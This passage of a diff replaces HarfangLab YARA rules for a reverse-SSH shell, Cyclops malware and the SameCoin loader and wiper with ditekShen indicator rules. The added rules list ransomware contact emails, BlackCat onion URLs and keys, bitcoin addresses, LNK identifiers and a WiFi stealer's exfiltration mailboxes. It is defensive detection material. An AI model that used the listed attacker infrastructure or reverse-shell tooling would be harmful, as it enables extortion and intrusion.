-		$a4 = "<|SENHA|>Snh: " wide fullword
-		$a5 = "<|SENHA|>Token: " wide fullword
-		$a6 = "<|BB-AMARELO|>" wide fullword
-		$a7 = "<|BB-AZUL|>" wide fullword
-		$a8 = "<|BB-PROCURADOR|>" wide fullword
-		$a9 = "<|ITAU-SNH-CARTAO|>" wide fullword
-		$a10 = "<|ITAU-TK-APP|>" wide fullword
-		$dga = { 76 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 78 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 7A 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 77 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 6B 00 00 00 B0 04 02 00 FF FF FF FF 01 00 00 00 79 00 00 00 }
+		$s1 = "getmyfilesback@airmail.cc" ascii wide nocase
 
 	condition:
-		$dga and ( 4 of ( $a* ) )
+		any of them
 }
-rule HARFANGLAB_Nhas_Reverse_Shell_Unpacked_Large : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lokilocker
 {
 	meta:
-		description = "Matches unpacked NHAS reverse_ssh file samples"
-		author = "HarfangLab"
-		id = "7d910d10-49a1-5fb5-b5bd-49155413c433"
-		date = "2024-09-24"
-		modified = "2025-04-16"
-		reference = "TRR250201"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L254-L275"
-		license_url = "N/A"
-		hash = "18556a794f5d47f93d375e257fa94b9fb1088f3021cf79cc955eb4c1813a95da"
-		logic_hash = "eedbf91f9ea7607dc68126840da338035b48509c5649a89f490d8cdfb32844b2"
+		description = "Detects files referencing identities associated with LokiLocker ransomware"
+		author = "ditekShen"
+		id = "ab2cf390-4544-54ed-913c-d463d0f1bdb0"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L523-L531"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "1ab9a2ce7e39d916b389e2adb975e3558ddb7d87f7e9494e6b20cb25edd3cb84"
 		score = 75
-		quality = 80
-		tags = "FILE"
-		context = "file"
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "/NHAS/reverse_ssh/cmd/client" ascii
-		$s2 = "/handlers.runCommandWithPty" ascii
-		$s3 = "/connection.RegisterChannelCallbacks" ascii
-		$s4 = "/internal.RemoteForwardRequest" ascii
-		$s5 = "github.com/pkg/sftp" ascii
-		$s6 = "github.com/creack/pty" ascii
-		$s7 = "main.Fork" ascii fullword
+		$s1 = "Unlockpls.dr01@yahoo.com" ascii wide nocase
 
 	condition:
-		filesize > 2MB and filesize < 30MB and ( ( uint32be( 0 ) == 0x7F454C46 ) or ( uint16be( 0 ) == 0x4D5A ) ) and ( 5 of them )
+		any of them
 }
-rule HARFANGLAB_Nhas_Reverse_Shell_Pe_Inmem_Large
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Blackcat
 {
 	meta:
-		description = "Matches packed NHAS reverse_ssh PE samples in-memory during execution"
-		author = "HarfangLab"
-		id = "f6b38e11-c405-5623-bea3-3a8d96b435af"
-		date = "2024-09-24"
-		modified = "2025-04-16"
-		reference = "TRR250201"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L276-L294"
-		license_url = "N/A"
-		hash = "7798b45ffc488356f7253805dc9c8d2210552bee39db9082f772185430360574"
-		logic_hash = "b9bbbbd93dc39f8c16c7f8275fa73f4c345c3ba8f21da76ae491e89d3a22c473"
+		description = "Detects files referencing identities associated with BlackCat ransomware"
+		author = "ditekShen"
+		id = "21038f8e-73cd-59d2-9eb3-6947d263ab79"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L533-L569"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "eb0a4d26170f030775f778cc524749ca283dfa983f84bd364e4df6321eb96cf1"
 		score = 75
-		quality = 80
+		quality = 73
 		tags = ""
-		context = "memory"
 
 	strings:
-		$s1 = "\\rprichard\\proj\\winpty\\src\\agent\\" ascii
-		$s2 = "\\Users\\mail\\source\\winpty\\src\\" ascii
-		$s3 = "Successfully connnected" ascii
-		$s4 = "*main.decFunc" ascii fullword
-		$s6 = "keepalive-rssh@golang.org" ascii fullword
-		$s7 = ".(*sshFxpSetstatPacket)." ascii
+		$pk1 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0B0ni9tyKHSJmU6gc1iRwNTklYocRKmLPUyOthUIHnZHwL1M2pKlMBwXx81bboVS6Cf8YaCoWW1bCmLwPX421sG22xkmtMy/SfiG8jaYtYiA7r7hOdIUnJgRo6vDvNafZlSD32tFVVjuX8Ec79qj2FM7/MmNcseUgpIQaEACuZcSzMK+jZA4BLT9b5Akkec2hPOXGTPmgaXjL9EJE+0rhNZcm/m6xe4/S5eL2kSCVsNUeG8xWuSO2kDRS8xY3rtJOCNEdqZp1rxzTkhgj3hHqr7AoFAkxNblQ538JcdF5+CGINxckA/ldmP7wQd92tmFk2vcl2WeQykFwMM6L6MsQwIDAQAB" ascii wide
+		$pk2 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA49gzJwP9UwEuYQZT1cdgSpxG6z8TVNLPfS4Qwd3vpWHEOAuvi8JGVEpHPGZnrD1QFoDLSTva3PZ4mqtIVO79GOYb5uQkP7LdJGWbLAjUGptVGmB67jKOOLLrjmuBDHpJXSOGG/vw5vajr4MhNnsvoBLPOC0AOzPM6GBDgKdC9zdUGNEreAjOR4neqwZ2jfYl5k5e3eRF86hmWhGXJQaU1uTmDJwgQIzmUZKo+YCfAHbEbSA4HhsumJfw0MJN7RfKPEQkEVvRIBibHnJuIp1bxk3IGPzTCbyQLHMVLz8wgElEexu8/aO3FT6w4uPY3qD+r2W+ri7xIdEN/pTz6TBKvwIDAQAB" ascii wide
+		$pk3 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8tKPNFCbU5Unr9jxlTk4RmUdVhcRydJFts6hMpLzcAXIR2yxiNC0QiF4UovAIpGwX6kxOW7kOaOvABJQP6QENMNSg030VlLoTP+ndfFwIt+X+RUflG4UWPE8yu+kzGpCwp7UjX+hD/SpFbSFRRh3BvL3vEq04DzE0AzifEBE4yxKpLsrMsXyZzWy9Nza8NTO2jrBxoEVM2xCLkULp0wZEPDwgeKGkoxMzqavVWBC+Vxi0atKstbo7/TloNenPagl/eUErk9C8tT67zKgbEh3TFtREgaxa/yrjBvN48BU8JGGxLxy4AeGF0vOUdD0WkJsWYzLVg21ApgJaCDr5zDPuQIDAQAB" ascii wide
+		$pk4 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEApw3tWdMaWJvNf2Mejy5H0Y6kuj+lstNpwFyismGDEYhWKPps9c68xl+84o6uLKfqPzNvLnSxlVa6DitcJGeKJEQkzN+C1e1KsfzM63jHybREB2hs+dHbqBq4dbamIQcTrrr4mKzuHJ7aok4mlpRx2Un1XOJaodoV7xOHO7ui5v6uK39MJ3rvitSEBvv5oI0WDlp3IFmtd6UM6r2nygY1ncAUuasalZgF1Vaz7VXOWyX2ReQHbYWWRCR1qyKMQcBtjT5POXx9B8ek1pnU4p65kGe9M794Bhhh20GN24gY5a+zwXwstaNTO9luwd4xjjRQAVsDgjrjkzti27G11ICn6wIDAQAB" ascii wide
+		$pk5 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq8kj5LQJngPsY7AhTaJsUXc5FrSGeKS5gw5PIqk2QPM9TY6+us8TRRzWZ7rGk1zns2klpzpRMUzLIqB8lpCkJjqkOUGfgqs+HN4VIOpoJgFY897xstJCxTc+8pYQEsSqClxJllscU0okkLSQqndIR2Gznlg3qfcwyncJAFBInyqM+L4kbwCQZ6x5HNiLe2lJn8RP2aDiMI+RS1uLYron2G7rxDTUQnxThMtgLAeko8ulaB3TpB0g4lmHCenkEZeBNs81986+MjHnv7KkiscZ7ZrezKjNaIxRs8BAcD9y+Q9QQxCvZMS01ITNXcgiItbA4dsGq1fPJ42yBkkiIodsEQIDAQAB" ascii wide
+		$pk6 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqEoytNrMZRoqyIsFpcjiqVWpuV+cC9jS1umXNg/AnJF/xE7LONAmb1p8Dsx1igIUd65IXfFUxmJjFO5hf8LIBzvjUbBll4lbSgGTAUHa3Jbmr/imle6QftmY32J7dDb4WuJUOx+vLNT0I72CESiyotSzwgvLwjyubTmzTJMkqviYOcgDj45NVOx669cG6FWEaJo3PUZzRx9LS6pkOn8tW+W4NzmHMcrma+LOakan7NU6Khv5Hf5ARNsAA+KvDfP1WXJ/VsLXj6x8SdX0v2iS+y58ehUUmlxc8HNsYdOGFwrwYX9zLyJDedsbPg02c4AE4KXt8vH4+j4lVFtruSy4vwIDAQAB" ascii wide
+		$pk7 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAt9uYkHzaizNXg/S11ncTTLybkMtqrKW8gg6TyzbGWnRNROl9O+l1VZBLG0xiMt1mZbuStl8Lt3l1vlkMa92kgLjN+UfKmq3KhBEheN2uMmR0WpwV83kceVRmzr5lug4RyQ/xA6/OXK4NptDIT4L6CUTBWMyk2mmY0Cq9HyyrjdnHeAXWAcQGFEac7W4jTjONZqI+lgScPewS+cPFnz1hAD0IAqzj5X2mZVSfFGR3tDoIe42jw5wb6W2yi8zb3mgKrGtTBbw0Ppj0UgKrmdN5iFmfUQHLEzKAakDggLcBtrW1o5+4WMaZOLw8maU5byvjXu3F3i3GdQe8SKTYcVK5OQIDAQAB" ascii wide
+		$pk8 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAugqZ4ATE9+9FqununW/DBvGosnUX/bNxQzMYUmE14GJIbNa6vwYSNXOlG09mvdAqZqD3lXihWDjy25+gzqSeS+Fs2qNyTdfGPA8iu2xx5RRUXKLGFThxtIzg3fohAK3+LxJVhxtuITAT38IHacc7dVLHsrddu4UDjiHGFdvXjB55Nwe5cu1BYylHsARMYycBA2FwLP57cKvc2/C3OXBAF6qbsVXBcyFhrKOOYA/+5IjFfEhgHy2FLHRf8lmPQPbSlrM6dk+W4D5KVqOPx/eFp0geUJJlmlre3flI29qWS20bkGqAEz9j07y69HGYN9Nt7+DRgBwrpNo/EkZkuaSTtQIDAQAB" ascii wide
+		$pk9 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuuAQlnowSGaSi2XgnwaHQAFZ6e7C0SwpAyyLTncJ4l5cwFbM+mwnV+iV3a+ert8WqOmW1aKOCjTPXrXNoirQgboVpLfhIIT1uOOss4O8lodRxgB6QrLCI7PYMZ+8VgIdEPPzsjmTFLxFc7DERxnSjhGdRQIjZNjm7bGScJD0MayDL9KTkVdJtC+C9n5dwEwg6XtQbwLDeaGZaByOgB/zR6tlcPQCNU9rj1qfcVrI/dFW4br/NnJbqrH714z+dvCa18IJTcu3kW74CAilvHrl5qFDd8CCQhjLrjQDPxAoCba9aXKr6dwt34/MU0tVRTYjzMAxR4yTh3oEjVT+HifvVwIDAQAB" ascii wide
+		$pk10 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwcPjnPl8bI1A0iudX70FKkTjnLjHyetHN2kAIcyOG10K8vm67n/Ma9mAnoDggD3D6UtAbwjvHwPW1m9WF+MrnBXmBizE0JpwOLtVFcHeVLJXlYn/C5RNZziTCwjauH6TlT7Mo/oHfg7nX4IXEuaeAZz8g9ioeJ1Lydi9ZZM1gmdNk8KuKR0zrrJ6MMAGrhMtblLFVwtMn7IlNjT/BgSL4pDyNa++wI5P4R2rMykJwGu/7o2kKE2IFimtFDyZ5a+CX46cdKt7uo5eKFiqf/jTes9/y5AgoS69mt4fRvWFhP7qHXRO2gG8XAc+9suhiuVUWZTAu3xXz5VsmBtk8pzcpwIDAQAB" ascii wide
+		$pk11 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwMQXFMtYf60KrbUVwNVoPhhrCTNMY3Zv+/WULZRZfJ4dMhYozDxtRVdtBDKtuYuHCGLu/Ymf9wKFFXgVH3En7qI1sU2UdjNR4086X8oSTMUn/GwEAEIZAHtSFuk6AXcXW+eO0yxPF+lt5AZcNnJocWBVZ8RWGvsQdtGgtZalttAynROC4RUGkvD1h1ssMteHWneFLpfzSPGlbu0s0cemsrTPmhexGIenup/YjNdmhbfvvYE9kZfPebGtZHw6oQXWcG7sAlvkGciJl3Eo9FznNj0K+v8WQW5L/UbosZaYVJbxlbtySvqUqZbkLKsmp91tr9bvTiDMZuXZS7iHVqchUQIDAQAB" ascii wide
+		$pk12 = "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxbKVxwYe4PpnPm0XtuqShDqFWCFRBw0tYo2vmLwVPlwa+0+ox8+nF0mzWC3ZZT2XkGSodszosOoocfKAwOjQnA+4/Hokl4hgG6K8O7wWuWlvgo4fkcZShy2cMY9FaC6e4bMfurlDFt7OVrKKWAyEGv49Etq6LNoyl5ddM/XmspG52gscRoIcOTwBL4bD8nVcamZXqE4j2mS62HicQ6q9YgRVs1PLbgVPbg8c2rFzpN1e8wZdPtvyGON0m3CmxsYa63yianbnBAS4WnxEnoI7eCZZNkblr+kZB4J9War5VYHu9lFw4XWeuHget/Rn8oGCJOMHkZMz23NpUVaX9htQAwIDAQAB" ascii wide
+		$url1 = "://zujgzbu5y64xbmvc42addp4lxkoosb4tslf5mehnh7pvqjpwxn5gokyd.onion" ascii wide
+		$url2 = "://alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion" ascii wide
+		$url3 = "://2cuqgeerjdba2rhdiviezodpu3lc4qz2sjf4qin6f7std2evleqlzjid.onion" ascii wide
+		$url4 = "://aoczppoxmfqqthtwlwi4fmzlrv6aor3isn6ffaiic55wrfumxslx3vyd.onion" ascii wide
+		$url5 = "://b4twqa2mvob3s6uvuyfra5xk3qgps2v5kkt7k2qnb7rpdu3j4fkntead.onion" ascii wide
+		$url6 = "://b6v4ojs7jfvftvcoagjxp7qz33yeljydqy6afzsh26vqbzcjwz4b3zad.onion" ascii wide
+		$url7 = "://htnpafzbvddr2llstwbjouupddflqm7y7cr7tcchbeo6rmxpqoxcbqqd.onion" ascii wide
+		$url8 = "://id7seexjn4bojn5rvo4lwcjgufjz7gkisaidckaux3uvjc7l7xrsiqad.onion" ascii wide
+		$url9 = "://mu75ltv3lxd24dbyu6gtvmnwybecigs5auki7fces437xvvflzva2nqd.onion" ascii wide
+		$url10 = "://odf3dt34tkqndw5h2l5gt2gwwd3jct5rwwjusbd3vlin2jueyv2qkgid.onion" ascii wide
+		$url11 = "://rfosusl6qdm4zhoqbqnjxaloprld2qz35u77h4aap46rhwkouejsooqd.onion" ascii wide
+		$url12 = "://sty5r4hhb5oihbq2mwevrofdiqbgesi66rvxr5sr573xgvtuvr4cs5yd.onion" ascii wide
+		$url13 = "://xqoykemmcivwtpxh3a6pu3w7sstr2y7hapxdiv4caaxidurmwwbjx2id.onion" ascii wide
+		$url14 = "://y4722ss64vel5hmph75te7lx2x5xz463322ypjirm5ytxviijtdpybid.onion" ascii wide
 
 	condition:
-		( all of them )
+		(1 of ( $pk* ) and 1 of ( $url* ) )
 }
-rule HARFANGLAB_Nhas_Reverse_Shell_Elf_Inmem_Large
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Koxic
 {
 	meta:
-		description = "Matches packed NHAS reverse_ssh ELF samples in-memory during execution"
-		author = "HarfangLab"
-		id = "cd6f7b81-b8df-5e2b-9da6-981d1f62c131"
-		date = "2024-09-24"
-		modified = "2025-04-16"
-		reference = "TRR250201"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L295-L312"
-		license_url = "N/A"
-		hash = "9f97997581f513166aae47b3664ca23c4f4ea90c24916874ff82891e2cd6e01e"
-		logic_hash = "54ba4fc366fb6e4a252d51528ede3ec418b369881ad98e9119d1a9650b6a1bab"
+		description = "Detects files referencing identities associated with LokiLocker ransomware"
+		author = "ditekShen"
+		id = "4c4ff722-cac1-5967-9e79-681f47566e96"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L571-L580"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "ca4d0e85cf4c7a134609262e21d5cef98100ba0a046d17ffe51bf3975dc7cae9"
 		score = 75
-		quality = 80
+		quality = 73
 		tags = ""
-		context = "memory"
 
 	strings:
-		$s1 = "/NHAS/reverse_ssh/cmd/client" ascii
-		$s2 = "/handlers.runCommandWithPty" ascii
-		$s3 = "/connection.RegisterChannelCallbacks" ascii
-		$s4 = "/internal.RemoteForwardRequest" ascii
-		$s7 = "main.Fork" ascii fullword
+		$s1 = "wilhelmkox@tutanota.com" ascii wide nocase
+		$s2 = "F3C777D22A0686055A3558917315676D607026B680DA5C8D3D4D887017A2A844F546AE59F59F" ascii wide
 
 	condition:
-		( all of them )
+		any of them
 }
-rule HARFANGLAB_Charmingkitten_Cyclops : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ryuk
 {
 	meta:
-		description = "Detects Cyclops Golang Malware"
-		author = "HarfangLab"
-		id = "2cc7b2ff-25ca-5eac-a607-c3ee5136e0aa"
-		date = "2024-08-05"
-		modified = "2025-04-16"
-		reference = "TRR240801"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L313-L333"
-		license_url = "N/A"
-		hash = "fafa68e626f1b789261c4dd7fae692756cf71881c7273260af26ca051a094a69"
-		logic_hash = "70ab3f44b6889d478a94dc6aefcd30f0e82e0b80bcf26921167b72f35bdb7fa8"
+		description = "Detects files referencing identities associated with Ryuk ransomware"
+		author = "ditekShen"
+		id = "00cf99da-ff3c-5c91-8966-69a8afc8613a"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L582-L592"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "a2b6106fc49dd254ca936e285fa0c2a3aee7110832686638d20d369d77f6c48f"
 		score = 75
-		quality = 80
-		tags = "FILE"
-		context = "file"
+		quality = 71
+		tags = ""
 
 	strings:
-		$go = " Go build ID: \"" ascii
-		$a1 = "dep\tback-service\t(devel)" ascii fullword
-		$a2 = "/brain-loader-enc.go\x00" ascii
-		$a3 = "back-service/go-mux/api" ascii
-		$a4 = "/JD-M42KItJncJfqb38qh/" ascii
+		$s1 = "WayneEvenson@protonmail.com" ascii wide nocase
+		$s2 = "WayneEvenson@tutanota.com" ascii wide nocase
+		$s3 = "14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk" ascii wide
 
 	condition:
-		filesize > 2MB and filesize < 20MB and ( uint16( 0 ) == 0x5A4D ) and $go and ( 2 of ( $a* ) )
+		any of them
 }
-rule HARFANGLAB_Samecoin_Campaign_Loader : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lockdown
 {
 	meta:
-		description = "Matches the loader used in the SameCoin campaign"
-		author = "HarfangLab"
-		id = "ab4d59f6-300d-5cdf-b91f-87f8cc1f0eac"
-		date = "2024-02-13"
-		modified = "2025-04-16"
-		reference = "TRR240201"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L334-L354"
-		license_url = "N/A"
-		hash = "cff976d15ba6c14c501150c63b69e6c06971c07f8fa048a9974ecf68ab88a5b6"
-		logic_hash = "7df04ab208d2caa5a137b1c3481ef734df54bbe8330979f524b16e9ba8cf48d5"
+		description = "Detects files referencing identities associated with LockDown / cantopen ransomware"
+		author = "ditekShen"
+		id = "603f0113-d77b-590c-b2a0-804c6d1fbfbc"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L594-L603"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "cb17bb92d6e8189a08508481b75d301a1227906815c684753859914d77d7b3e7"
 		score = 75
-		quality = 80
-		tags = "FILE"
-		context = "file"
+		quality = 73
+		tags = ""
 
 	strings:
-		$hebrew_layout = "0000040d" fullword ascii
-		$runas = "runas" fullword ascii
-		$jpg_magic = { FF D8 FF E0 00 10 4A 46 49 46 00 01 }
-		$wl_1 = "C:\\Users\\Public\\Microsoft Connection Agent.jpg" ascii
-		$wl_2 = "C:\\Users\\Public\\Video.mp4" ascii
-		$wl_3 = "C:\\Users\\Public\\Microsoft System Agent.exe" ascii
-		$wl_4 = "C:\\Users\\Public\\Microsoft System Manager.exe" ascii
-		$wl_5 = "C:\\Users\\Public\\Windows Defender Agent.exe"
+		$s1 = "CCWhite@onionmail.org" ascii wide nocase
+		$s2 = "bc1q6ug0vrxz66d564qznclu9yyyvn6zurskezmt64" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 5MB and filesize < 7MB and $hebrew_layout and $runas and $jpg_magic and 3 of ( $wl_* )
+		any of them
 }
-rule HARFANGLAB_Samecoin_Campaign_Wiper : FILE
+rule DITEKSHEN_INDICATOR_KB_LNK_BOI_MAC : FILE
 {
 	meta:
-		description = "Matches the wiper used in the SameCoin campaign"
-		author = "HarfangLab"
-		id = "695e9181-cc96-5212-b33c-4d55065b7b85"
-		date = "2024-02-13"
-		modified = "2025-04-16"
-		reference = "TRR240201"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L355-L373"
-		license_url = "N/A"
-		hash = "e6d2f43622e3ecdce80939eec9fffb47e6eb7fc0b9aa036e9e4e07d7360f2b89"
-		logic_hash = "ebe7c90398464ecf74ede17551c2ebc58b851ba6502092320934d1f5353581a2"
+		description = "Detects Windows Shortcut .lnk files with previously known bad Birth Object ID and MAC address combination"
+		author = "ditekSHen"
+		id = "bfef07dc-a368-5119-82dd-de2096b17dd1"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L605-L637"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "31a7966a0ea0fca363d2b926b06c8acbdae0c24dd2156389196255dbbf4ed662"
 		score = 75
-		quality = 80
+		quality = 73
 		tags = "FILE"
-		context = "file"
 
 	strings:
-		$code = { 68 57 04 00 00 50 E8 }
-		$wl_1 = "C:\\Users\\Public\\Microsoft Connection Agent.jpg" ascii
-		$wl_2 = "C:\\Users\\Public\\Video.mp4" ascii
-		$wl_3 = "C:\\Users\\Public\\Microsoft System Agent.exe" ascii
-		$wl_4 = "C:\\Users\\Public\\Microsoft System Manager.exe" ascii
-		$wl_5 = "C:\\Users\\Public\\Windows Defender Agent.exe" ascii
+		$boi1 = { 2C ED AC EC 94 7A E8 11 9F DE 00 0C 29 A1 A9 40 }
+		$boi2 = { 3F 54 89 18 46 CB E8 11 BD 0E 08 00 27 6D D5 D9 }
+		$boi3 = { DE 63 02 FE 57 A2 E8 11 92 E8 5C F3 70 8B 16 F2 }
+		$boi4 = { C2 CC 13 98 18 B9 E2 41 82 40 54 A8 AD E2 0A 9A }
+		$boi5 = { C4 9D 3A D4 C2 29 3D 47 A9 20 EE A4 D8 A7 D8 7D }
+		$boi6 = { E4 51 EC 20 66 61 EA 11 85 CD B2 FC 36 31 EE 21 }
+		$boi7 = { 6E DD CE 86 0F 07 90 4B AF 18 38 2F 97 FB 53 62 }
+		$boi8 = { 25 41 87 AE F1 D2 EA 11 93 97 00 50 56 C0 00 08 }
+		$boi9 = { C4 9D 3A D4 C2 29 3D 47 A9 20 EE A4 D8 A7 D8 7D }
+		$boi10 = { 5C 46 EC 05 A6 60 EB 11 85 EB 8C 16 45 31 19 7F }
+		$boi11 = { 30 8B 17 86 9B 35 C5 40 A7 9D 48 5C D6 3D F3 5C }
+		$boi12 = { E5 21 1D 04 9D A4 E9 11 A9 37 00 0C 29 0F 29 89 }
+		$boi13 = { 34 5F AC 8A 4E CE ED 4D 8E 55 83 8E EA 24 B3 4E }
+		$boi14 = { 49 77 25 3B D6 E1 EB 11 9C BB 00 D8 61 85 FD 9F }
+		$mac1 = { 00 0C 29 A1 A9 40 }
+		$mac2 = { 08 00 27 6D D5 D9 }
+		$mac3 = { 5C F3 70 8B 16 F2 }
+		$mac4 = { 00 0C 29 5A 39 04 }
+		$mac5 = { B2 FC 36 31 EE 21 }
+		$mac6 = { 00 50 56 C0 00 08 }
+		$mac7 = { 8C 16 45 31 19 7F }
+		$mac8 = { 00 0C 29 0F 29 89 }
+		$mac9 = { 00 D8 61 85 FD 9F }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 200KB and $code and 3 of ( $wl_* )
+		uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and filesize < 3KB and ( 1 of ( $boi* ) and 1 of ( $mac* ) )
 }
-rule HARFANGLAB_Samecoin_Campaign_Tasksspreader : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Powershellwifistealer
 {
 	meta:
-		description = "Detect .NET Task Scheduler that is dropper by SameCoin Loader"
-		author = "HarfangLab"
-		id = "7dcfdecd-00c3-502a-b29e-a10a1fd9543f"
-		date = "2024-02-13"
-		modified = "2025-04-16"
-		reference = "TRR240201"
-		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L374-L411"
-		license_url = "N/A"
-		hash = "b447ba4370d9becef9ad084e7cdf8e1395bafde1d15e82e23ca1b9808fef13a7"
-		logic_hash = "61d602c343365608e5bc587ee9c7898e256f2411d78c7fe74c211e68bf4ab707"
+		description = "Detects email accounts used for exfiltration observed in PowerShellWiFiStealer"
+		author = "ditekShen"
+		id = "fa19e422-c682-5464-b034-330942daf3bd"
+		date = "2024-01-23"
+		modified = "2024-01-23"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L691-L704"
+		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
+		logic_hash = "f119b54032e2a6ca35819e811e6479b00936115d98ef6e928f4c819d04a8321f"
 		score = 75
-		quality = 53
-		tags = "FILE"
-		context = "file"
+		quality = 63
+		tags = ""
 
 	strings:
-		$dotNet = ".NETFramework,Version" ascii fullword
-		$a1 = "System.DirectoryServices.ActiveDirectory" ascii fullword
-		$a2 = "GetTypeFromProgID" ascii fullword
-		$a3 = "DirectorySearcher" ascii fullword
-		$a4 = "SearchResultCollection" ascii fullword
-		$a5 = "UnaryOperation" ascii fullword
-		$b1 = "$dc1b29f0-9a87-4383-ad8b-01285614def1" ascii fullword
-		$b2 = "Windows Defender Agent" ascii fullword
-		$b3 = "Windows Defender Agent.exe" wide ascii fullword
-		$b4 = /(\\)?C(:|\$)\\Users\\Public\\Microsoft System Agent\.exe/ wide fullword
-		$b5 = "MicrosoftEdgeUpdateTaskMachinesCores" wide fullword
-		$b6 = "WindowsUpdate" wide fullword
-		$c1 = "RegisterTaskDefinition" wide fullword
-		$c2 = "DisallowStartIfOnBatteries" wide fullword
-		$c3 = "StopIfGoingOnBatteries" wide fullword
-		$c4 = "Schedule.Service" wide fullword
-		$c5 = "\\Domain Users" wide fullword
-		$c6 = "(objectClass=computer)" wide fullword
+		$s1 = "hajdebebreidekreide@gmail.com" ascii wide nocase
+		$s2 = "usb@pterobot.net" ascii wide nocase
+		$s3 = "umairdadaber@gmail.com" ascii wide nocase
+		$s4 = "mrumairok@gmail.com" ascii wide nocase
+		$s5 = "credsenderbot@gmail.com" ascii wide nocase
+		$s6 = "easywareytb@gmail.com" ascii wide nocase
 
 	condition:
-		filesize > 8KB and filesize < 40KB and ( uint16be( 0 ) == 0x4D5A ) and $dotNet and ( 4 of ( $a* ) ) and ( ( ( any of ( $b* ) ) and ( any of ( $c* ) ) ) or ( all of ( $c* ) ) )
+		any of them
 }
-rule HARFANGLAB_Samecoin_Campaign_Nativewiper : FILE
